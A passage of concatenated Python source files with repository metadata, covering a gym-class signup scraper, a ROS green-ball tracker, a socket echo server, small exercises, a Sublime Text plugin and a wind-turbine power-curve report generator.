f"-------------------------------------------") Chosen.drop(Chosen[Chosen[NINF[-2]].isin(Done)].index, inplace=True) pd.DataFrame(columns= NINF).to_csv(doneF, index= False) Errors = pd.read_csv(errorsF)[NINF[-2]].to_list() if Errors: print(f"The sign up for these classes failed:\n" f"{Errors.iloc[:,:3]}\n" f"Please check manually if you are still interested and " f"allow them to be deleted from the program.") conf = "n" while conf.lower() != "y": conf = input("Allow? (y/n):") if conf.lower() == "y": Errors = pd.DataFrame(columns= NINF) Errors.to_csv(errorsF, index = False) Chosen.drop(Chosen[Chosen[NINF[-2]].isin(Errors)].index, inplace=True) else: conf = input("There is no benefit in keeping them !\n" "Are you sure " "you don't want to let them go?\n" "(y/n):") Chosen.to_csv(chosenF, index= False) """ This uses requests and beautiful soup to setup the iterators. """ r = requests.get(URL) soup = BeautifulSoup(r.text, "lxml") classes = soup.find(id= "classes") days = classes.find_all(class_= "scheduleDay")[:8] """ The following loop gets the basic info from the websites and keeps it in the dictionary DFs as DataFrames """ DFs = {} for day in days: date= day["id"] if date in saved: continue DFs[date] = pd.DataFrame(columns= INF) # iterate over each class in the day dayclss = day.find_all("div") for clss in dayclss: #then within each class I select the link in "schedSignup" if any(x in clss["class"] for x in INT): link = clss.find(class_= "schedSignup").a["href"] inf = getInfo(link) DFs[date] = DFs[date].append(pd.Series(inf, index= INF), ignore_index=True) """ This condition runs the showDays loop to check each new day's classes for availability and presents the options """ num = 0 NewDF = pd.DataFrame(columns= NINF) if DFs: result = showDays(DFs, num, NewDF) NewDF, num = result[0], result[1] ############# """ Here, the requests waiting in the 'chosen' csv file are presented and offered for cancellation """ # this just sets up the sig and UId variables for sigs= [f for f in listdir(LOC2) if f[:3]== "Sig"] if sigs: with open(f"{LOC2}\{sigs[0]}", "r") as s: UId = int(s.read()) ##### Cancel if Chosen.shape[0]: print(f"\n============== OPTIONS TO CANCEL ======================\n" f"These are signups that are waiting to be executed:\n\n" f"{Chosen.iloc[:,:3]}\n\n" f"Type in the row number on the left if you want to cancel it, seperate with commas\n" f"Otherwise, just hit enter and confirm\n") confirm = "n" while confirm.lower() != "y": inp = input("CANCEL:") if inp: try: inp = list(map(int, inp.split(","))) print(f"cancel these:\n" f"{Chosen.loc[inp, [NINF[0], NINF[1], NINF[2]]]}") confirm = input("Confirm (y/n):") if confirm.lower() == "y": Chosen.drop(inp, inplace=True) except: print(f"There seems to be a mistake in your input,\n" f"please don't type any unnecessary commas, spaces or words.") else: confirm = input("Keep all (y/n):") """ If there are newly available classes: the following while loop will get requests and add the newly chosen ones to the 'chosen' csv file It will also give Unique IDs to each class based on the UId variable retrieved from the Signal File (SigA or SigB) """ ##### Choose if num: print(f"=====================================\n" f"The column on the RIGHT of each list contains the code to choose the class\n" f"please type in your choice(s)" f"(seperate codes with commas if you want multiple, hit enter if you want none.)\n") confirm = "n" while confirm.lower() != "y": choice = input("Choice:") if choice: try: choice = list(map(int,choice.split(","))) chosen = NewDF[NewDF[NINF[-1]].isin(choice)].copy() if max(choice) <= NewDF[NINF[-1]].max(): print(f"These are your new choices:\n" f"{chosen.iloc[:,:3].to_string(index= False)}\n") if Chosen.shape[0]: print(f"These are still waiting to be executed:\n" f"{Chosen.iloc[:, :3].to_string(index=False)}\n") else: print(f"There are no signups waiting.") confirm = input("Confirm (y/n):") else: print(f"You may have forgotten a comma or got the wrong number,\n" f"please try again") except: print(f"There seems to be a mistake in your input,\n" f"please don't type any unnecessary commas, spaces or words.") else: print(f"You chose none.") chosen = pd.DataFrame() if Chosen.shape[0]: print(f"These are still waiting to be executed:\n" f"{Chosen.iloc[:, :3].to_string(index= False)}\n") else: print(f"There are no signups waiting.") confirm = input("Confirm (y/n):") if chosen.shape[0]: chosen[NINF[-2]] = [UId +i for i in range(1, chosen.shape[0]+1)] UId = chosen[NINF[-2]].max() Chosen = Chosen.append(chosen, ignore_index=True) # The days and requestes are saved Chosen.to_csv(chosenF, index= False) unflagIt(flag) for d in DFs: DFs[d].to_csv(fr"{LOC}\{d}.csv", index = False) # The SigFile is updated if sigs: nxtSig = int(sigs[0].split(".")[0][3:])+1 remove(fr"{LOC2}\{sigs[0]}") with open(fr"{LOC2}\Sig{nxtSig}.txt", "w") as s: s.write(str(UId))
Stryder-Git/Movati_Signup
Get_Reqs.py
Get_Reqs.py
py
7,822
python
en
code
0
github-code
6
16704619000
#!/usr/bin/env python # Code property of Matteo Scanavino - [email protected] # Minor changes by Iris David Du Mutel import rospy # from std_msgs.msg import Float32MultiArray from myrobot.msg import vect_msg from geometry_msgs.msg import Twist from nav_msgs.msg import Odometry import cv2 # import cv2.cv import os import math import numpy as np #import pyrealsense2 as rs import message_filters from sensor_msgs.msg import Image, CameraInfo from cv_bridge import CvBridge, CvBridgeError import imutils #collection of OpenCV and Python convenience functions from collections import deque from scipy.spatial.transform import Rotation as R def green_ball(): rospy.init_node('realsense_behaviour', anonymous=True) pub = rospy.Publisher('gb_vect', vect_msg, queue_size=10) color_sub = message_filters.Subscriber('camera/color/image_raw',Image) # depth_sub = message_filters.Subscriber('camera/depth/image_raw',Image) x_sub = message_filters.Subscriber('/odom',Odometry) ts = message_filters.ApproximateTimeSynchronizer([color_sub, x_sub], queue_size=10,slop=0.1) ts.registerCallback(callback,pub) rospy.spin() def callback(color_raw, x_sub,pub): vect = [0, 0] msg = vect_msg() bridge = CvBridge() greenLower = (29, 86, 6) greenUpper = (64, 255, 255) # realsense min and max distance try: color_image = bridge.imgmsg_to_cv2(color_raw, "bgr8") except CvBridgeError as e: print(e) Xest = x_sub # # Variable assignation: [yaw, pitch, roll] = get_rotation(Xest) psi_est = yaw*180/math.pi frame = imutils.resize(color_image, width=600) blurred = cv2.GaussianBlur(frame, (11, 11), 0) hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV) # construct a mask for the color "green", then perform # a series of dilations and erosions to remove any small # blobs left in the mask mask = cv2.inRange(hsv, greenLower, greenUpper) mask = cv2.erode(mask, None, iterations=2) mask = cv2.dilate(mask, None, iterations=2) # find contours in the mask and initialize the current # (x, y) center of the ball cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) cnts = imutils.grab_contours(cnts) center = None if len(cnts) > 0: # find the largest contour in the mask, then use # it to compute the minimum enclosing circle and # centroid c = max(cnts, key=cv2.contourArea) ((x, y), radius) = cv2.minEnclosingCircle(c) if x<280: vect[0]=90 vect[1]=0 elif x>305: vect[0]=-90 vect[1]=0 else: if radius<100: vect[0]=psi_est vect[1]=0.8 else: vect[0]= psi_est vect[1]=0 M = cv2.moments(c) center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"])) print(center) # only proceed if the radius meets a minimum size if radius > 10: # draw the circle and centroid on the frame, # then update the list of tracked points cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 255), 2) print('radius=', radius) cv2.circle(frame, center, 5, (0, 0, 255), -1) else: print('out of frame') # show the frame to our screen cv2.imshow("Frame", frame) key = cv2.waitKey(1) & 0xFF # Send data msg.header.stamp = rospy.Time.now() msg.angle = vect[0] msg.value = vect[1] rospy.loginfo('Realsense vector data sent') pub.publish(msg) def get_rotation(Xest): orientation_q = Xest.pose.pose.orientation orientation_list = [orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w] r = R.from_quat(orientation_list) EuAn = r.as_euler('zyx', degrees=False) return EuAn if __name__ == '__main__': try: green_ball() except rospy.ROSInterruptException: pass
IrisDuMutel/myrobot
scripts/green_ball.py
green_ball.py
py
4,054
python
en
code
1
github-code
6
1346892633
import threading import socket def server_echo (sock): while True: conn, addr = sock.accept() while True: data = conn.recv(1024) if not data: break if data == b"close": # print ("Close connection") break conn.send(data) # print (data) conn.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #s.bind(('127.0.0.1', 2222)) s.bind(('0.0.0.0', 2222)) s.listen(10) for i in range (10): pserver = threading.Thread(target=server_echo, name="srv"+str (i+1), args=[s]) pserver.start()
gusevna/webserver
02_webserver.py
02_webserver.py
py
651
python
en
code
0
github-code
6
30497846861
import unittest from main import * class TestEveryMethodInMain(unittest.TestCase): def test_GetContainer(self): self.assertIsNotNone(getPricesContainer()) self.assertIsNotNone(returnListedPricesToServer()) self.assertIsNotNone(returnInOrderedPricesToServer()) #checkPriceDiffWithDatabase #getSearchedItems def test_takeMinPriceFromRange(self): _input = [{"CRL Eastern [Dominus]":{"Normal":{"price":[200,300]}}},{"Alchemist":{"Black":{"price":[2300,2500]}}},{"Overgrowth":{"Titanium White":{"price":[350,450]}},"Dominus":{"Lime":{"price":[4900,5300]}}}] _output = [{"CRL Eastern [Dominus]":{"Normal":{"price":200}}},{"Alchemist":{"Black":{"price":2300}}},{"Overgrowth":{"Titanium White":{"price":350}},"Dominus":{"Lime":{"price":4900}}}] self.assertEqual(takeMinPriceFromRange(_input), _output) self.assertEqual(takeMinPriceFromRange([{"Item": {"paint": {"price":[21,37]}}}]), [{"Item": {"paint": {"price":21}}}]) def test_calculateQuickSellPrice(self): _input = [{"CRL Eastern [Dominus]":{"Normal":{"price":200}}},{"Alchemist":{"Black":{"price":2300}}},{"Overgrowth":{"Titanium White":{"price":350}},"Dominus":{"Lime":{"price":4900}}}] _output = [{"CRL Eastern [Dominus]":{"Normal":{"price":100}}},{"Alchemist":{"Black":{"price":2200}}},{"Overgrowth":{"Titanium White":{"price":250}},"Dominus":{"Lime":{"price":4800}}}] self.assertEqual(calculateQuickSellPrice(_input, 100), _output) # tests = [{input: [], expected: []},{items: [], expected: []}] # for test in tests: # assert(test.expected, takeMinPriceFromRange(test.items)) if __name__ == "__main__": unittest.main()
rekjef/rl-tools
Price tracker/tests.py
tests.py
py
1,698
python
en
code
0
github-code
6
75188708346
# May 10, 1981 00:31 # 정보 취합 month, day, year, time = input().split() day = int(day[:-1]) year = int(year) hour, minute = map(int, time.split(':')) # 윤년 여부에 따라 2월 날짜 변경 month_name_lst = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December'] month_days_lst = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] if (year%400 == 0) or (year%4 == 0 and year%100 != 0): month_days_lst[1] += 1 # 1년 총 시간 (단위는 분으로) total_time = sum(month_days_lst) * 24 * 60 # 현재 총 시간 current_month_idx = month_name_lst.index(month) current_time = (sum(month_days_lst[:current_month_idx]) + day-1)*24*60 + hour*60 + minute print(current_time/total_time*100)
zacinthepark/Problem-Solving-Notes
boj/1340.py
1340.py
py
765
python
ko
code
0
github-code
6
71567925627
import os while True: info = input().split("-") if info[0] == 'Create': file = open(f"files/{info[1]}", "w") file.close() elif info[0] == 'Add': with open(f"files/{info[1]}", "a") as file: file.write(f"{info[2]}\n") elif info[0] == 'Replace': try: with open(f"files/{info[1]}", "r+") as file: text = file.readlines() file = open(f"files/{info[1]}", "w") for i in range(len(text)): text[i] = text[i]. replace(info[2], info[3]) file.write("".join(text)) file.close() except FileNotFoundError: print("An error occurred") elif info[0] == 'Delete': try: os.remove(f"files/{info[1]}") except FileNotFoundError: print("An error occurred") else: break
lorindi/SoftUni-Software-Engineering
Python-Advanced/7.File Handling/3_file_manipulator.py
3_file_manipulator.py
py
879
python
en
code
3
github-code
6
18667310322
# This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. # import sublime, sublime_plugin from os import path class GoToPackageFileCommand(sublime_plugin.TextCommand): def run(self, edit): f = self.view.file_name() curFolder = path.dirname(f) print("Current folder: {0}".format(curFolder)) packagejs = self.find_package_js(curFolder) if packagejs: print("Found {0}".format(packagejs)) sublime.active_window().open_file(packagejs) else: sublime.status_message("package.js not found in hierarchy of {0}".format(curFolder)) def find_package_js(self, f): print("Checking '{0}'".format(f)) packagejs = path.join(f, "package.js") if path.isfile(packagejs): return packagejs else: newF = path.dirname(f) if newF != f: return self.find_package_js(newF)
Eliga/sublime-update-package-js
GoToPackageFile.py
GoToPackageFile.py
py
989
python
en
code
1
github-code
6
27099720616
import xlwt import numpy as np import os import os.path import colour from ..configuration.base_configuration import Filter from ..configuration.base_configuration import TimeOfDayFilter from ..core.status import Status from plots import MatplotlibPlotter from power_deviation_matrix import PowerDeviationMatrixSheet import version as ver def get_valid_excel_sheet_name(sheet_name, if_too_long_replace={}): max_chars = 31 invalid_chars = ':|\\/*?[]' for c in invalid_chars: sheet_name = sheet_name.replace(c, '') if len(sheet_name) > max_chars: for sub_str in if_too_long_replace: sheet_name = sheet_name.replace(sub_str, if_too_long_replace[sub_str]) return sheet_name[:max_chars] def chckMake(path): """Make a folder if it doesn't exist""" if not os.path.exists(path): os.makedirs(path) class PNGPlotter: def plot(self, analysis, path): chckMake(path) plotter = MatplotlibPlotter(path, analysis) if analysis.hasActualPower: plotter.plotPowerCurve(analysis.baseline.wind_speed_column, analysis.actualPower, analysis.allMeasuredPowerCurve, specified_title = 'Warranted', mean_title = 'Measured Mean', gridLines = True) plotter.plotPowerCurve(analysis.baseline.wind_speed_column, analysis.actualPower, analysis.allMeasuredPowerCurve, show_scatter = False, fname = "PowerCurve - Warranted vs Measured Mean", specified_title = 'Warranted', mean_title = 'Measured Mean', mean_pc_color = 'blue', gridLines = True) if analysis.turbRenormActive: plotter.plotTurbCorrectedPowerCurve(analysis.baseline.wind_speed_column, analysis.measuredTurbulencePower, analysis.allMeasuredTurbCorrectedPowerCurve) if analysis.hasAllPowers: plotter.plotPowerLimits(specified_title = 'Warranted', gridLines = True) plotter.plotBy(analysis.windDirection, analysis.hubWindSpeed, analysis.dataFrame, gridLines = True) plotter.plotBy(analysis.windDirection, analysis.shearExponent, analysis.dataFrame, gridLines = True) plotter.plotBy(analysis.windDirection, analysis.hubTurbulence, analysis.dataFrame, gridLines = True) plotter.plotBy(analysis.hubWindSpeed, analysis.hubTurbulence, analysis.dataFrame, gridLines = True) if analysis.hasActualPower: plotter.plotBy(analysis.hubWindSpeed, analysis.powerCoeff, analysis.dataFrame, gridLines = True) plotter.plotBy('Input Hub Wind Speed', analysis.powerCoeff, analysis.allMeasuredPowerCurve, gridLines = True) if analysis.inflowAngle in analysis.dataFrame.columns: analysis.dataFrame.loc[analysis.dataFrame[analysis.inflowAngle]>180,analysis.inflowAngle] -= 360 plotter.plotBy(analysis.windDirection,analysis.inflowAngle,analysis.dataFrame, gridLines = True) plotter.plotCalibrationSectors() if analysis.hasActualPower: if analysis.multiple_datasets: plotter.plot_multiple(analysis.baseline.wind_speed_column, analysis.actualPower, analysis.allMeasuredPowerCurve) class TimeSeriesExporter: def export(self, analysis, time_series_path, clean=True, full=True, calibration=True, full_df_output_dir="TimeSeriesData"): data_frame = analysis.dataFrame dataset_configs = analysis.datasetConfigs if clean: data_frame.to_csv(time_series_path, sep='\t') if full: root_path = os.path.join(os.path.dirname(time_series_path), full_df_output_dir) chckMake(root_path) for ds in dataset_configs: ds.data.fullDataFrame.to_csv(root_path + os.sep + "FilteredDataSet_AllColumns_{0}.dat".format(ds.name), sep='\t') if calibration and hasattr(ds.data,"filteredCalibrationDataframe"): ds.data.filteredCalibrationDataframe.to_csv( root_path + os.sep + "CalibrationDataSet_{0}.dat".format(ds.name), sep=',') class Report: bold_style = xlwt.easyxf('font: bold 1') no_dp_style = xlwt.easyxf(num_format_str='0') one_dp_style = xlwt.easyxf(num_format_str='0.0') two_dp_style = xlwt.easyxf(num_format_str='0.00') three_dp_style = xlwt.easyxf(num_format_str='0.000') four_dp_style = xlwt.easyxf(num_format_str='0.0000') percent_style = xlwt.easyxf(num_format_str='0.00%') percent_no_dp_style = xlwt.easyxf(num_format_str='0%') def __init__(self, windSpeedBins, calculated_power_deviation_matrix_dimensions): self.version = ver.version self.windSpeedBins = windSpeedBins self.calculated_power_deviation_matrix_dimensions = calculated_power_deviation_matrix_dimensions def report(self, path, analysis): report_power_curve = analysis.hasActualPower book = xlwt.Workbook() plotsDir = os.path.dirname(path) plotter = PNGPlotter() plotter.plot(analysis, plotsDir) gradient = colour.ColourGradient(-0.1, 0.1, 0.01, book) if report_power_curve: sh = book.add_sheet("PowerCurves", cell_overwrite_ok=True) settingsSheet = book.add_sheet("Settings", cell_overwrite_ok=True) self.reportSettings(settingsSheet, analysis) if report_power_curve: rowsAfterCurves = [] #rowsAfterCurves.append(self.reportPowerCurve(sh, 0, 0, 'uniqueAnalysisId', analysis.specified_power_curve, analysis)) #needs fixing + move to settings sheet if analysis.specified_power_curve is not None: if len(analysis.specified_power_curve.data_frame) != 0: rowsAfterCurves.append( self.reportPowerCurve(sh, 1, 0, 'Specified', analysis.specified_power_curve, analysis)) if analysis.hasActualPower: #for name in analysis.residualWindSpeedMatrices: # residualMatrix = analysis.residualWindSpeedMatrices[name] # # if residualMatrix != None: # self.reportPowerDeviations(book, "ResidualWindSpeed-%s" % name, residualMatrix, gradient) if analysis.hasShear and analysis.innerMeasuredPowerCurve != None: rowsAfterCurves.append(self.reportPowerCurve(sh, 1, 5, 'Inner', analysis.innerMeasuredPowerCurve, analysis) ) if analysis.hasShear and analysis.outerMeasuredPowerCurve != None: rowsAfterCurves.append(self.reportPowerCurve(sh, 1, 10, 'Outer', analysis.outerMeasuredPowerCurve, analysis) ) rowsAfterCurves.append( self.reportPowerCurve(sh, 1, 15, 'All', analysis.allMeasuredPowerCurve, analysis) ) if analysis.turbRenormActive: rowsAfterCurves.append(self.reportPowerCurve(sh, 1, 20, 'TurbulenceRenormalisedPower', analysis.allMeasuredTurbCorrectedPowerCurve, analysis) ) if analysis.specified_power_curve is not None: rowAfterCurves = max(rowsAfterCurves) + 5 sh.write(rowAfterCurves-2, 0, "Power Curves Interpolated to Specified Bins:", self.bold_style) specifiedLevels = analysis.specified_power_curve.data_frame.index if analysis.hasShear and analysis.innerMeasuredPowerCurve != None: self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 5, 'Inner', analysis.innerMeasuredPowerCurve, specifiedLevels) if analysis.hasShear and analysis.outerMeasuredPowerCurve != None: self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 10, 'Outer', analysis.outerMeasuredPowerCurve, specifiedLevels) self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 15, 'All', analysis.allMeasuredPowerCurve, specifiedLevels) if analysis.turbRenormActive: self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 20, 'TurbulenceRenormalisedPower', analysis.allMeasuredTurbCorrectedPowerCurve, specifiedLevels) self.reportInterpolatedPowerCurve(sh, rowAfterCurves, (25 if analysis.turbRenormActive else 20), 'DayTime', analysis.dayTimePowerCurve, specifiedLevels) self.reportInterpolatedPowerCurve(sh, rowAfterCurves, (30 if analysis.turbRenormActive else 25), 'NightTime', analysis.nightTimePowerCurve, specifiedLevels) self.reportPowerDeviations(book, "Baseline Power Deviations", analysis.baseline_power_deviations, gradient) #if analysis.rewsActive: # self.reportPowerDeviations(book, "REWS Deviation", analysis.rewsMatrix, gradient) for correction_name in analysis.corrections: correction = analysis.corrections[correction_name] deviations = analysis.corrected_deviations[correction.correction_name] sheet_name = get_valid_excel_sheet_name("{0} Power Deviations".format( correction.short_correction_name), if_too_long_replace={'Power Deviations': 'PowDevs'}) self.reportPowerDeviations(book, sheet_name, deviations, gradient) if analysis.nominal_wind_speed_distribution.absolute_path is not None: sh = book.add_sheet("EnergyAnalysis", cell_overwrite_ok=True) self.report_aep(sh, analysis) if len(analysis.calibrations) == 1: calSheet = book.add_sheet("Calibration", cell_overwrite_ok=True) self.reportCalibration(calSheet,analysis.calibrations[0],timeStepInSeconds = analysis.timeStepInSeconds) elif len(analysis.calibrations) > 1: i = 0 for cal in analysis.calibrations: i += 1 calSheet = book.add_sheet("Calibration_%03d" % i, cell_overwrite_ok=True) self.reportCalibration(calSheet,cal,timeStepInSeconds = analysis.timeStepInSeconds) book.save(path) def reportCalibration(self,sh,calibration,timeStepInSeconds = 600.): conf, calib = calibration sh.write(0, 0, "Dataset Name", self.bold_style) sh.write(1, 0, conf.name) startRow = 3 col = -14 if 'belowAbove' in calib.calibrationSectorDataframe.columns : belowAbove = True else: belowAbove = False col+=16 row=startRow sh.write(row,col,conf.name, self.bold_style) sh.write(row,col+1,"Method:"+conf.calibrationMethod, self.bold_style) row += 1 sh.write(row,col,"Bin", self.bold_style) sh.write(row,col+1,"Slope", self.bold_style) sh.write(row,col+2,"Offset", self.bold_style) if conf.calibrationMethod != 'Specified': sh.write(row,col+3,"Count", self.bold_style) sh.write(row,col+4,"Hours", self.bold_style) if belowAbove: sh.write(row,col+5,"Count <= 8m/s", self.bold_style) sh.write(row,col+6,"Hours <= 8m/s", self.bold_style) sh.write(row,col+7,"Count > 8m/s", self.bold_style) sh.write(row,col+8,"Hours > 8m/s", self.bold_style) sh.write(row,col+9,"Speedup at 10m/s", self.bold_style) sh.write(row,col+10,"% Speedup at 10m/s", self.bold_style) sh.write(row,col+11,"Filter (Total Hours > 24)", self.bold_style) sh.write(row,col+12,"Filter (Hours Below/Above 8m/s > 6)", self.bold_style) sh.write(row,col+13,"Filter (Speedup Change < 2%)", self.bold_style) sh.write(row,col+14,"Valid Sector", self.bold_style) row+=1 for key in sorted(calib.calibrationSectorDataframe.index): sh.write(row,col,float(key), self.bold_style) sh.write(row,col+1,calib.calibrationSectorDataframe['Slope'][key], self.four_dp_style) sh.write(row,col+2,calib.calibrationSectorDataframe['Offset'][key], self.four_dp_style) if conf.calibrationMethod != 'Specified': if 'Count' in calib.calibrationSectorDataframe.columns: sh.write(row,col+3,calib.calibrationSectorDataframe['Count'][key], self.no_dp_style) sh.write(row,col+4,calib.calibrationSectorDataframe['Count'][key]*(timeStepInSeconds/3600.0), self.one_dp_style) if belowAbove: ba = calib.calibrationSectorDataframe.loc[key,'belowAbove'] sh.write(row,col+5,ba[0], self.no_dp_style) sh.write(row,col+6,ba[0]*(timeStepInSeconds/3600.0), self.one_dp_style) sh.write(row,col+7,ba[1], self.no_dp_style) sh.write(row,col+8,ba[1]*(timeStepInSeconds/3600.0), self.one_dp_style) sh.write(row,col+9,calib.calibrationSectorDataframe['SpeedUpAt10'][key], self.four_dp_style) sh.write(row,col+10,(calib.calibrationSectorDataframe['SpeedUpAt10'][key]-1.0), self.percent_style) totalHoursValid = calib.getTotalHoursValidity(key, timeStepInSeconds) sh.write(row,col+11, "TRUE" if totalHoursValid else "FALSE") if belowAbove: belowAboveValid = calib.getBelowAboveValidity(key, timeStepInSeconds) sh.write(row,col+12, "TRUE" if belowAboveValid else "FALSE") speedUpChangeValid = calib.getSpeedUpChangeValidity(key) sh.write(row,col+13, "TRUE" if speedUpChangeValid else "FALSE") sectorValid = calib.getSectorValidity(key, timeStepInSeconds) sh.write(row,col+14, "TRUE" if sectorValid else "FALSE", self.bold_style) row += 1 if len(conf.calibrationFilters) > 0: row += 2 sh.write(row, col, "Calibration Filters", self.bold_style) row += 1 sh.write(row, col, "Data Column", self.bold_style) sh.write(row, col+1, "Filter Type", self.bold_style) sh.write(row, col+2, "Inclusive", self.bold_style) sh.write(row, col+3, "Filter Value", self.bold_style) sh.write(row, col+4, "Active", self.bold_style) row += 1 for filt in conf.calibrationFilters: if isinstance(Filter,TimeOfDayFilter): sh.write(row, col, "Time Of Day Filter") sh.write(row, col + 1, str(filt.startTime)) sh.write(row, col + 2, str(filt.endTime)) sh.write(row, col + 3, str(filt.daysOfTheWeek)) sh.write(row, col + 4, str(filt.months)) else: sh.write(row, col, filt.column) sh.write(row, col+1, filt.filterType) sh.write(row, col+2, filt.inclusive) sh.write(row, col+3, str(filt)) sh.write(row, col+4, filt.active) # always true if in list... row += 1 def reportSettings(self, sh, analysis): config = analysis sh.write(0, 1, "PCWG Tool Version Number:") sh.write(0, 2, self.version) sh.write(0, 3, xlwt.Formula('HYPERLINK("http://www.pcwg.org";"PCWG Website")')) row = 3 labelColumn = 1 dataColumn = 2 sh.col(labelColumn).width = 256 * 30 sh.col(dataColumn).width = 256 * 50 sh.col(dataColumn+1).width = 256 * 50 #Corretions sh.write(row, labelColumn, "Density Correction Active", self.bold_style) sh.write(row, dataColumn, config.densityCorrectionActive) row += 1 sh.write(row, labelColumn, "REWS Correction Active", self.bold_style) sh.write(row, dataColumn, config.rewsActive) row += 1 sh.write(row, labelColumn, "Turbulence Correction Active", self.bold_style) sh.write(row, dataColumn, config.turbRenormActive) row += 1 #General Settings row += 1 sh.write(row, labelColumn, "Time Step In Seconds", self.bold_style) sh.write(row, dataColumn, analysis.timeStepInSeconds) row += 1 sh.write(row, labelColumn, "Power Curve Minimum Count", self.bold_style) sh.write(row, dataColumn, config.powerCurveMinimumCount) row += 1 sh.write(row, labelColumn, "Power Curve Mode", self.bold_style) sh.write(row, dataColumn, config.powerCurveMode) row += 1 #Inner Range row += 1 sh.write(row, labelColumn, "Inner Range", self.bold_style) row += 1 for dimension in config.inner_range_dimensions: sh.write(row, labelColumn, "Lower {0}".format(dimension.parameter), self.bold_style) sh.write(row, dataColumn, dimension.lower_limit) row += 1 sh.write(row, labelColumn, "Upper {0}".format(dimension.parameter), self.bold_style) sh.write(row, dataColumn, dimension.upper_limit) row += 1 #Turbine #row += 1 #sh.write(row, labelColumn, "Turbine", self.bold_style) #row += 1 #sh.write(row, labelColumn, "Specified Power Curve", self.bold_style) #sh.write(row, dataColumn, config.specified_power_curve.absolute_path) #row += 1 #datasets row += 1 sh.write(row, labelColumn, "Datasets", self.bold_style) row += 2 for datasetConfig in analysis.datasetConfigs: sh.write(row, labelColumn, "Name", self.bold_style) sh.write(row, dataColumn, datasetConfig.name) row += 1 sh.write(row, labelColumn, "Path", self.bold_style) sh.write(row, dataColumn, datasetConfig.path) row += 1 sh.write(row, labelColumn, "Rated Power", self.bold_style) sh.write(row, dataColumn, datasetConfig.ratedPower) row += 1 sh.write(row, labelColumn, "HubHeight", self.bold_style) sh.write(row, dataColumn, datasetConfig.hubHeight) row += 1 sh.write(row, labelColumn, "Diameter", self.bold_style) sh.write(row, dataColumn, datasetConfig.diameter) row += 1 sh.write(row, labelColumn, "Cut In Wind Speed", self.bold_style) sh.write(row, dataColumn, datasetConfig.cutInWindSpeed) row += 1 sh.write(row, labelColumn, "Cut Out Wind Speed", self.bold_style) sh.write(row, dataColumn, datasetConfig.cutOutWindSpeed) row += 1 sh.write(row, labelColumn, "Start Date", self.bold_style) sh.write(row, dataColumn, str(datasetConfig.startDate)) row += 1 sh.write(row, labelColumn, "End Date", self.bold_style) sh.write(row, dataColumn, str(datasetConfig.endDate)) row += 1 sh.write(row, labelColumn, "Hub Wind Speed Mode", self.bold_style) sh.write(row, dataColumn, datasetConfig.hubWindSpeedMode) row += 1 sh.write(row, labelColumn, "Density Mode", self.bold_style) sh.write(row, dataColumn, datasetConfig.densityMode) row += 2 sh.write(row, labelColumn, "REWS Defined", self.bold_style) sh.write(row, dataColumn, datasetConfig.rewsDefined) row += 1 sh.write(row, labelColumn, "Rotor Mode", self.bold_style) sh.write(row, dataColumn, datasetConfig.rotorMode) row += 1 sh.write(row, labelColumn, "Hub Mode", self.bold_style) sh.write(row, dataColumn, datasetConfig.hubMode) row += 1 sh.write(row, labelColumn, "Number of Rotor Levels", self.bold_style) sh.write(row, dataColumn, datasetConfig.numberOfRotorLevels) row += 2 sh.write(row, labelColumn, "Measurements", self.bold_style) row += 1 sh.write(row, labelColumn, "Input Time Series Path", self.bold_style) sh.write(row, dataColumn, datasetConfig.input_time_series.absolute_path) row += 1 sh.write(row, labelColumn, "Date Format", self.bold_style) sh.write(row, dataColumn, datasetConfig.dateFormat) row += 1 sh.write(row, labelColumn, "Time Step In Seconds", self.bold_style) sh.write(row, dataColumn, datasetConfig.timeStepInSeconds) row += 1 sh.write(row, labelColumn, "Time Stamp", self.bold_style) sh.write(row, dataColumn, datasetConfig.timeStamp) row += 1 sh.write(row, labelColumn, "Bad Data Value", self.bold_style) sh.write(row, dataColumn, datasetConfig.badData) row += 1 sh.write(row, labelColumn, "Header Rows", self.bold_style) sh.write(row, dataColumn, datasetConfig.headerRows) row += 1 sh.write(row, labelColumn, "Turbine Location Wind Speed", self.bold_style) sh.write(row, dataColumn, datasetConfig.turbineLocationWindSpeed) row += 1 sh.write(row, labelColumn, "Hub Wind Speed", self.bold_style) sh.write(row, dataColumn, datasetConfig.hubWindSpeed) row += 1 sh.write(row, labelColumn, "Hub Turbulence", self.bold_style) sh.write(row, dataColumn, datasetConfig.hubTurbulence) row += 1 sh.write(row, labelColumn, "Reference Wind Speed", self.bold_style) sh.write(row, dataColumn, datasetConfig.referenceWindSpeed) row += 1 sh.write(row, labelColumn, "Reference Wind Speed Std Dev", self.bold_style) sh.write(row, dataColumn, datasetConfig.referenceWindSpeedStdDev) row += 1 sh.write(row, labelColumn, "Reference Wind Direction", self.bold_style) sh.write(row, dataColumn, datasetConfig.referenceWindDirection) row += 1 sh.write(row, labelColumn, "Reference Wind Direction Offset", self.bold_style) sh.write(row, dataColumn, datasetConfig.referenceWindDirectionOffset) row += 1 sh.write(row, labelColumn, "Density", self.bold_style) sh.write(row, dataColumn, datasetConfig.density) row += 1 sh.write(row, labelColumn, "Temperature", self.bold_style) sh.write(row, dataColumn, datasetConfig.temperature) row += 1 sh.write(row, labelColumn, "Pressure", self.bold_style) sh.write(row, dataColumn, datasetConfig.pressure) row += 1 if len(datasetConfig.turbineShearMeasurements) > 0: row = self.writeShear(sh,labelColumn,dataColumn,row,datasetConfig.referenceShearMeasurements,'Reference Location ') row = self.writeShear(sh,labelColumn,dataColumn,row,datasetConfig.turbineShearMeasurements,'Turbine Location ') else: row = self.writeShear(sh,labelColumn,dataColumn,row,datasetConfig.referenceShearMeasurements) sh.write(row, labelColumn, "Power", self.bold_style) sh.write(row, dataColumn, datasetConfig.power) row += 2 if 